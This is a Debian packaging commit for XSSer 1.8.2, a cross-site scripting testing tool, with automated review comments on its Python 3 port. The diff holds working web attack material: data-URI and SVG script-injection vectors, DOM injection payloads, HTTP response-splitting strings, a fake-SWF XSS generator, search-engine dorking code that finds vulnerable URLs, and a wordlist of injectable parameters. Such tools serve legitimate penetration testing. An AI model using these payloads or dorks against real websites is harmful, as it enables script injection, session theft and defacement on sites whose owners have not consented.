Commit 7e38fb9e authored by Sophie Brun's avatar Sophie Brun

New upstream version 1.8-2

parent dcd05d73
GPL Cooperation Commitment
Version 1.0
Before filing or continuing to prosecute any legal proceeding or claim
(other than a Defensive Action) arising from termination of a Covered
License, we commit to extend to the person or entity ('you') accused
of violating the Covered License the following provisions regarding
cure and reinstatement, taken from GPL version 3. As used here, the
term 'this License' refers to the specific Covered License being
enforced.
However, if you cease all violation of this License, then your
license from a particular copyright holder is reinstated (a)
provisionally, unless and until the copyright holder explicitly
and finally terminates your license, and (b) permanently, if the
copyright holder fails to notify you of the violation by some
reasonable means prior to 60 days after the cessation.
Moreover, your license from a particular copyright holder is
reinstated permanently if the copyright holder notifies you of the
violation by some reasonable means, this is the first time you
have received notice of violation of this License (for any work)
from that copyright holder, and you cure the violation prior to 30
days after your receipt of the notice.
We intend this Commitment to be irrevocable, and binding and
enforceable against us and assignees of or successors to our
copyrights.
Definitions
'Covered License' means the GNU General Public License, version 2
(GPLv2), the GNU Lesser General Public License, version 2.1
(LGPLv2.1), or the GNU Library General Public License, version 2
(LGPLv2), all as published by the Free Software Foundation.
'Defensive Action' means a legal proceeding or claim that We bring
against you in response to a prior proceeding or claim initiated by
you or your affiliate.
'We' means each contributor to this repository as of the date of
inclusion of this file, including subsidiaries of a corporate
contributor.
This work is available under a Creative Commons Attribution-ShareAlike
4.0 International license (https://creativecommons.org/licenses/by-sa/4.0/).
......@@ -4,7 +4,7 @@ PYTHON=`which python`
DESTDIR=/
BUILDIR=$(CURDIR)/debian/xsser
PROJECT=xsser
VERSION=0.7.0
VERSION=1.8.2
all:
@echo "make source - Create source package"
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -2,9 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
This file is part of the xsser project, https://xsser.03c8.net
This file is part of the XSSer project, https://xsser.03c8.net
Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -20,20 +20,24 @@ with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
........
List of search engines: http://en.wikipedia.org/wiki/List_of_search_engines
List of search engines: https://en.wikipedia.org/wiki/List_of_search_engines
Currently supported: duck(default), startpage, yahoo, bing
"""
import urllib2, traceback, re, random
urllib2.socket.setdefaulttimeout(5.0)
import urllib.request, urllib.error, urllib.parse, traceback, re, random
urllib.request.socket.setdefaulttimeout(5.0)
DEBUG = 0
class Dorker(object):
def __init__(self, engine='yahoo'):
def __init__(self, engine='duck'):
self._engine = engine
self.search_engines = [] # available dorking search engines
self.search_engines.append('bing')
self.search_engines.append('duck')
self.search_engines.append('startpage')
self.search_engines.append('yahoo')
self.search_engines.append('bing')
self.agents = [] # user-agents
try:
f = open("core/fuzzing/user-agents.txt").readlines() # set path for user-agents
......@@ -46,41 +50,63 @@ class Dorker(object):
"""
Perform a search and return links.
"""
if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018
search_url = 'https://www.bing.com/search?q="' + search + '"'
elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018
search_url = 'https://search.yahoo.com/search?q="' + search + '"'
if self._engine == 'bing': # works at 20-02-2011 -> 19-02-2016 -> 09-04-2018 -> 26-08-2019
search_url = 'https://www.bing.com/search?q="' + str(search) + '"'
print("\nSearching query:", urllib.parse.unquote(search_url))
elif self._engine == 'yahoo': # works at 20-02-2011 -> 19-02-2016 -> -> 09-04-2018 -> 26-08-2019
search_url = 'https://search.yahoo.com/search?q="' + str(search) + '"'
print("\nSearching query:", urllib.parse.unquote(search_url))
elif self._engine == 'duck': # works at 26-08-2019
search_url = 'https://duckduckgo.com/html/'
q = 'instreamset:(url):"' + str(search) + '"' # set query to search literally on results
query_string = { 'q':q }
print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]")
elif self._engine == 'startpage': # works at 26-08-2019
search_url = 'https://www.startpage.com/do/asearch'
q = 'url:"' + str(search) + '"' # set query to search literally on results
query_string = { 'cmd':'process_search', 'query':q }
print("\nSearching query:", urllib.parse.unquote(search_url) + " [POST: (" + q + ")]")
else:
print "\n[Error] This search engine is not supported!\n"
print "[Info] List of available:"
print '-'*25
print("\n[Error] This search engine is not being supported!\n")
print('-'*25)
print("\n[Info] Use one from this list:\n")
for e in self.search_engines:
print "+ "+e
print ""
print("+ "+e)
print("\n ex: xsser -d 'profile.asp?num=' --De 'duck'")
print(" ex: xsser -l --De 'startpage'")
print("\n[Info] Or try them all:\n\n ex: xsser -d 'news.php?id=' --Da\n")
try:
self.search_url = search_url
print "\n[Info] Search query:", urllib2.unquote(search_url)
user_agent = random.choice(self.agents).strip() # set random user-agent
referer = '127.0.0.1' # set referer to localhost / WAF black magic!
headers = {'User-Agent' : user_agent, 'Referer' : referer}
req = urllib2.Request(search_url, None, headers)
html_data = urllib2.urlopen(req).read()
print "\n[Info] Retrieving requested info..."
except urllib2.URLError, e:
if self._engine == 'bing' or self._engine == 'yahoo': # using GET
req = urllib.request.Request(search_url, None, headers)
elif self._engine == 'duck' or self._engine == 'startpage': # using POST
data = urllib.parse.urlencode(query_string)
req = urllib.request.Request(search_url, data, headers)
html_data = urllib.request.urlopen(req).read().decode('utf8')
print("\n[Info] Retrieving requested info...\n")
except urllib.error.URLError as e:
if DEBUG:
traceback.print_exc()
print "\n[Error] Cannot connect!"
print("\n[Error] Cannot connect!")
print("\n" + "-"*50)
return
if self._engine == 'bing':
regex = '<h2><a href="(.+?)" h=' # regex magics 09-04/2018
regex = '<h2><a href="(.+?)" h=' # regex magics 08/2019
if self._engine == 'yahoo':
regex = 'RU=(.+?)/RK=' # regex magics [09/04/2018]
regex = 'RU=(.+?)/RK=' # regex magics 08/2019
if self._engine == 'duck':
regex = '<a class="result__url" href="(.+?)">' # regex 08/2019
if self._engine == 'startpage':
regex = 'target="_blank">(.+?)</a>' # regex magics 08/2019
pattern = re.compile(regex)
links = re.findall(pattern, html_data)
links = re.findall(pattern, html_data, flags=0)
found_links = []
if links:
for link in links:
link = urllib2.unquote(link)
link = urllib.parse.unquote(link)
if self._engine == "yahoo":
if "RU=https://www.yahoo.com/" in link:
link = "" # invalid url
......@@ -90,14 +116,14 @@ class Dorker(object):
if link2 not in found_links: # parse that target is not duplicated
found_links.append(link)
else:
print "\n[Info] Not any link found for that query!"
print("\n[Error] Not any link found for that query!")
return found_links
if __name__ == '__main__':
for a in ['yahoo', 'bing']:
for a in ['bing', 'yahoo', 'duck', 'startpage']: # working at: 28/08/2019
dork = Dorker(a)
res = dork.dork("news.php?id=")
if res:
print "[+]", a, ":", len(res), "\n"
print("\n[+] Search Engine:", a, "| Found: ", len(res), "\n")
for b in res:
print " *", b
print(" *", b)
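Review bot: The unsupported-engine branch at L123-L136 prints its message and then falls through into the `try` at L137, where `search_url` was never assigned, so the call dies with an UnboundLocalError that the `urllib.error.URLError` handler at L154 does not catch; end the branch with `return` (the URLError path at L160 already returns None to the caller). The bing and yahoo URLs at L108 and L111 splice `search` into the query string unencoded, unlike the duck/startpage branches that go through `urllib.parse.urlencode`; `'https://www.bing.com/search?q=' + urllib.parse.quote('"' + str(search) + '"')` keeps characters such as `&` or `#` in a dork from truncating the query. `.read().decode('utf8')` at L152 can raise UnicodeDecodeError on a non-UTF-8 response, which the same handler also misses; `decode('utf8', errors='replace')` is sufficient for regex scraping. In the earlier hunk, L84 `urllib.request.socket.setdefaulttimeout(5.0)` reaches the socket module through a transitive import that is not part of urllib's interface; `import socket` and call `socket.setdefaulttimeout(5.0)` directly. The `dork` method begins above the L99 hunk.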
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -21,7 +19,7 @@ You should have received a copy of the GNU General Public License along
with xsser; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import urllib
import urllib.request, urllib.parse, urllib.error
class EncoderDecoder(object):
"""
......@@ -80,7 +78,7 @@ class EncoderDecoder(object):
"""
encoded=''
for char in string:
encoded=encoded+urllib.quote(char)
encoded=encoded+urllib.parse.quote(char)
return encoded
def _ipDwordEncode(self, string):
......@@ -102,15 +100,15 @@ class EncoderDecoder(object):
def _ipOctalEncode(self, string):
"""
Encode to octal.
"""
"""
encoded=''
tblIP = string.split('.')
# In the case it's not an IP
if len(tblIP)!=4:
return 0
octIP = map(lambda s: oct(int(s)).zfill(4), tblIP)
octIP = [oct(int(s)).zfill(4) for s in tblIP]
return ".".join(octIP)
if __name__ == "__main__":
encdec = EncoderDecoder()
print encdec._ipOctalEncode("127.0.0.1")
print(encdec._ipOctalEncode("127.0.0.1"))
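Review bot: The comprehension at L239 keeps `oct(int(s)).zfill(4)`, but under Python 3 `oct()` returns a `0o`-prefixed string and `zfill` pads in front of that prefix, so `_ipOctalEncode("127.0.0.1")` now yields `0o177.00o0.00o0.00o1` instead of the `0177.0000.0000.0001` the Python 2 version produced. Use an explicit octal format instead: `octIP = ['%04o' % int(s) for s in tblIP]`. The `__main__` block at L244 exercises exactly this call, so the regression is visible by running the module. The `return 0` at L237 for a non-IP input mixes an int into a str-returning method; callers are outside this hunk, so I would at least document that return in the docstring (`Returns 0 when *string* is not a dotted quad.`).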
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -30,8 +28,8 @@ class FlashInjections(object):
def flash_xss(self, filename, payload):
"""
Create -fake- flash movie (.swf) with code XSS injected.
"""
Create -fake- flash movie (.swf) with XSS codeinjected.
"""
root, ext = os.path.splitext(filename)
if ext.lower() in [".swf"]:
f = open(filename, 'wb')
......@@ -42,11 +40,11 @@ class FlashInjections(object):
content = user_payload
f.write(content)
f.close()
flash_results = "\nCode: "+ content + "\nFile: ", root + ext
flash_results = "\n[Info] XSS Vector: \n\n "+ content + "\n\n[Info] File: \n\n ", root + ext + "\n"
else:
flash_results = "\nPlease select a filename with extension .swf"
flash_results = "\n[Error] Supported extensions = .swf\n"
return flash_results
if __name__ == '__main__':
flash_xss_injection = FlashInjections('')
print flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>")
print(flash_xss_injection.flash_xss('FlashXSSpoison.swf' , "<script>alert('XSS')</script>"))
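Review bot: The comma at L271 makes `flash_results` a two-element tuple rather than the string the `else` branch at L274 returns, so `flash_xss` has two return shapes and the `print` at L279 shows a `('...', 'FlashXSSpoison.swf\n')` tuple; replace the comma with `+`: `flash_results = "\n[Info] XSS Vector: \n\n " + content + "\n\n[Info] File: \n\n " + root + ext + "\n"`. The file is opened with `'wb'` at L265 but `f.write(content)` at L268 passes a `str`, which raises TypeError on Python 3 — the very port this commit performs; `f.write(content.encode('utf-8'))` (or opening with `'w'`) is needed, ideally inside a `with` block so the handle is closed if the write fails. The image-injection hunk near the end of the diff (L606, L613) appears to have the same `'wb'`/`str` mismatch, with the added complication that prefixes such as `'‰PNG'` are text literals rather than the raw bytes that format expects — worth checking there too. `flash_xss` begins in the previous hunk at L257 and its body straddles both hunks.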
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,30 +24,36 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
DCPvectors = [
{ 'payload' : """<a href="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv YT4=""",
'browser' : """[Data Control Protocol Injection]""" },
{ 'payload' : """<iframe src="data:text/html;base64,JTNjc2NyaXB0JTNlYWxlcnQoIlhTUyIpO2hpc3RvcnkuYmFjaygpOyUzYy9zY3JpcHQlM2UiPjwv""",
{ 'payload' : """<a href="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></a>[B64]""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<iframe src="data:text/html;base64,[B64]%3cscript%3ealert("PAYLOAD");history.back();%3c/script%3e"></[B64]""",
'browser' : """[Data Control Protocol Injection]"""},
#{ 'payload' : """data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+""",
# 'browser' : """[Data Control Protocol Injection]"""},
#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KCJYU1MiKStBRHMtaGlzdG9yeS5iYWNrKCkrQURzQVBBLS9z-""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,LCtBRHdBY3dCakFISUFhUUJ3QUhRQVBnKy1hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCkrQURz""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,K0FEd0Fjd0JqQUhJQWFRQndBSFFBUGdCaEFHd0FaUUJ5QUhRQUtBQXhBQ2tBT3dCb0FHa0Fjd0Iw""",
# 'browser' : """[Data Control Protocol Injection]""" },
#{ 'payload' : """data:text/html;base64,K0FEdy1zY3JpcHQrQUQ0LWFsZXJ0KFhTUykrQURzLWhpc3RvcnkuYmFjaygpK0FEc0FQQS0vc2Ny aXB0K0FENC0=""",
# 'browser' : """[Data Control Protocol Injection]""" },
{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7aGlzdG9yeS5iYWNrKCk7PC9zY3JpcHQ+'))""",
{ 'payload' : """0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts('data:;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]'))""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """""",
'browser' : """[Data Control Protocol Injection]""" }
{ 'payload' : """<a href="data:application/x-x509-user-cert;&NewLine;base64&NewLine;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"&#09;&#10;&#11;>Y</a""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<EMBED SRC="data:image/svg+xml;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]" type="image/svg+xml" AllowScriptAccess="always"></EMBED>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<embed src="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></embed>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<iframe/src="data:text/html;&Tab;base64&Tab;,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:image/svg+xml; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """"><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html; base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]">""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<object data="data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]"></object>""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """<object data=data:text/html;base64,[B64]<script>alert("PAYLOAD");history.back();</script>[B64]></object>​""",
'browser' : """[Data Control Protocol Injection]"""},
{ 'payload' : """data:image/svg+xml;base64,[B64]<svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0" x="0" y="0" width="194" height="200" id="Y"><script type="text/ecmascript">alert("PAYLOAD");</script></svg>[B64]""",
'browser' : """[Data Control Protocol Injection]""" }
]
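Review bot: The unquoted `<object data=data:text/html...></object>` entry at L338 ends with an invisible zero-width character (nothing visible between `</object>` and the closing `"""`), so that vector carries a stray multibyte sequence that makes it differ from the otherwise parallel quoted variant at L336; it looks like copy-paste residue and should be deleted. Nothing in this file says what the `[B64]...[B64]` and `PAYLOAD` markers mean — I am inferring they are placeholders replaced elsewhere — so a one-line comment above `DCPvectors` such as `# [B64]...[B64] and PAYLOAD are placeholders filled in at runtime` would help the next reader. `DCPvectors` starts at L293, within the hunk.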
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,19 +24,14 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
DOMvectors = [
{ 'payload' : """?notname=PAYLOAD""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?notname=PAYLOAD&""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload':'''<object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="PAYLOAD" style="behavior:url(#x);"><param name=postdomevents /></object>''',
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?<script>history.pushState(0,0,'PAYLOAD');</script>""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?name=Y%0d%0a%0d%0aPAYLOAD""",
'browser' : """[Document Object Model Injection]"""},
{ 'payload' : """?foobar=name=PAYLOAD&""",
'browser' : """[Document Object Model Injection]"""}
]
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,41 +24,26 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
HTTPrs_vectors = [
{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;XSS&lt;/html&gt;
""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """XSS%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("XSS")</script>""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0D%0ASet-Cookie%3AXSS""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22XSS%22)%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22XSS%22)%3C/script%3Ehttp://www.test.com""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22XSS%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1""",
{ 'payload' : """%0d%0AContent-Length:%200%0d%0A%0d%0AHTTP/1.1%20200%20OK%0d%0AContent-Length:%2016%0d%0A%0d%0A&lt;html&gt;PAYLOAD&lt;/html&gt;""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """PAYLOAD%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2029%0d%0a%0d%0a<script>alert("PAYLOAD")</script>""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0D%0ASet-Cookie%3APAYLOAD""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:html%0A%0A%3Cbody%20onload=alert(%22PAYLOAD%22)%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-Type:text/html%0A%0A%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3Ehttp://www.test.com""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AContent-type:%20html%0A%0Ahttp://www.test.com/%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0AExpect:%20%3Cscript%3Ealert(%22PAYLOAD%22)%3C/script%3E""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified: Wed, 13 Jan 2006 12:44:23 GMT%0d%0aContent-Type:text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>XSS</html>%20HTTP/1.1
""",
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aCache-Control: no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]"""},
{ 'payload' : """%0d%0aContent-Type: text/html%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aPragma:no-cache%0d%0aContent-Type: text/html%0d%0a%0d%0a<html>PAYLOAD</html>%20HTTP/1.1""",
'browser' : """[Induced Injection]""" },
{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('%58%53%53');%2BADw-/script%2BAD4-
""",
'browser' : """[Induced Injection]""" }
{ 'payload' : """%0d%0AContent-Type: text/html;charset=UTF-7%0A%0A%2BADw-script%2BAD4-alert('PAYLOAD');%2BADw-/script%2BAD4-""",
'browser' : """[Induced Injection]""" }
]
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
.php?cmd=
.php?z=
.php?q=
.php?search=
.php?query=
.php?searchst­ring=
.php?keyword=­
.php?file=
.php?years=
.php?txt=
.php?tag=
.php?max=
.php?from=
.php?author=
.php?pass=
.php?feedback­=
.php?mail=
.php?cat=
.php?vote=
search.php?q=
headersearch.p­hp?sid=
/news.php?id=
/search_results.php?search=
/notice.php?msg=
/view.php?PID=
/search.php?search_keywords=
/contentPage.php?id=
/main.php?sid=
/feedpost.php?url=
/poll/­default.asp?catid=
?id=
?url=
?search=
?query=
?cmd=
?z=
?q=
?l=
?r=
?searchstring=
?keyword=­
?file=
?years=
?txt=
?tag=
?max=
?from=
?author=
?pass=
?feedback­=
?mail=
?cat=
?vote=
?sid=
?msg=
?category=
?PID=
?search_keywords=
?mid=
?catid=
?pid=
?order_direction=
?course_id=
?session=
?sfunction=
?search_keywords=
?site=
?errmsg=
?decl_id=
?num=
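Review bot: Several entries contain invisible characters that appear to be U+00AD soft hyphens inside or at the end of the parameter name — `searchstring` at L445, the trailing character after `keyword=` at L446, `feedback` at L455, `headersearch.php` at L460, `default.asp` at L469, and the `?keyword=`/`?feedback=` entries at L480 and L489 — so those strings will not match the parameter they spell; strip them so every line is plain ASCII. `?search_keywords=` appears twice (L497 and L505); dedupe unless the repetition is intentional. I cannot see a file header for this list, so I am assuming it is a plain-text wordlist rather than Python source.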
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
xsser is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
......@@ -26,79 +24,50 @@ Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
## Happy Cross Hacking! ;)
heuristic_test = [
# ascii
{ 'payload' : """XSS\\XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS/XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS>XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS<XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS;XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS'XSS""",
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS"XSS''',
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS=XSS""",
'browser' : """[Heuristic test]""" },
# hex/une
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%5CXSS""",
'browser' : """[Heuristic test]""" },
# / is the same on Unicode than in ASCII
#{ 'payload' : """XSS/XSS""",
# 'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3EXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3CXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3BXSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%27XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS%22XSS''',
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS%3DXSS""",
'browser' : """[Heuristic test]""" },
# dec
{ 'payload' : """XSS&#92XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#47XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#62XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#60XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#59XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#39XSS""",
'browser' : """[Heuristic test]""" },
{ 'payload' : '''XSS&#34XSS''',
'browser' : """[Heuristic test]""" },
'browser' : """[Heuristic test]""" },
{ 'payload' : """XSS&#61XSS""",
'browser' : """[Heuristic test]""" }
]
......@@ -2,11 +2,9 @@
# -*- coding: utf-8 -*-"
# vim: set expandtab tabstop=4 shiftwidth=4:
"""
$Id$
This file is part of the XSSer project, https://xsser.03c8.net
This file is part of the xsser project, http://xsser.03c8.net
Copyright (c) 2011/2016 psy <epsylon@riseup.net>
